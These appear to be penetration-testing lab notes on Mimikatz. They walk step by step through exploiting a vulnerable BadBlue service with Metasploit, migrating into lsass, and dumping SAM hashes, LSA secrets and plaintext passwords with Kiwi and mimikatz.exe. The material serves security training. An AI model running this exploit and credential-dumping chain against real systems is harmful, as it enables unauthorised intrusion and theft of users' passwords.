Mimikatz

Mimikatz is a post-exploitation tool used on Windows systems to extract clear-text passwords, password hashes, and Kerberos tickets from memory. The SAM (Security Accounts Manager) database stores hashed user passwords on Windows systems, and Mimikatz can extract these hashes from the memory of the lsass.exe process, where they are cached. You can use the pre-compiled Mimikatz executable or the Meterpreter extension, Kiwi, to achieve this.

Note: Mimikatz requires elevated privileges to run successfully.

Demo Dumping

nmap -sV [TARGET IP]

msfconsole -q
search badblue
use exploit/windows/http/badblue_passthru
set RHOSTS
exploit

meterpreter> sysinfo
getuid
pgrep lsass
migrate 788
getuid

# Using Kiwi Module
load kiwi
?
creds_all
lsa_dump_sam
lsa_dump_secrets

# Using Mimikatz directly
cd C:\\\\
cd Temp
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
shell
.\mimikatz.exe
privilege::debug
lsadump::sam
lsadump::secrets
sekurlsa::logonpasswords

First, I ran a network scan with Nmap to detect the version of services running on the target system using nmap -sV [TARGET IP].

Then, I launched the Metasploit framework with msfconsole -q and searched for an exploit related to a vulnerable service called "badblue" using search badblue. After finding the exploit, I set up the exploit by selecting use exploit/windows/http/badblue_passthru and configuring the target IP with set RHOSTS, then launched the exploit using exploit.

Once I successfully gained access, I checked system information with sysinfo and verified my user ID with getuid. I then searched for the lsass process ID using pgrep lsass and attempted to migrate my session into it with migrate 788 to escalate privileges. I rechecked my user ID with getuid to confirm the migration.

I then loaded the Kiwi module in Meterpreter, ran creds_all to retrieve stored credentials, and used lsa_dump_sam and lsa_dump_secrets to dump sensitive information, such as passwords and other secrets.

Lastly, I used Mimikatz directly. I uploaded the Mimikatz executable to the target system, accessed the shell, and ran Mimikatz. I elevated privileges with privilege::debug, dumped SAM hashes with lsadump::sam, retrieved secret information with lsadump::secrets, and extracted plaintext passwords with sekurlsa::logonpasswords.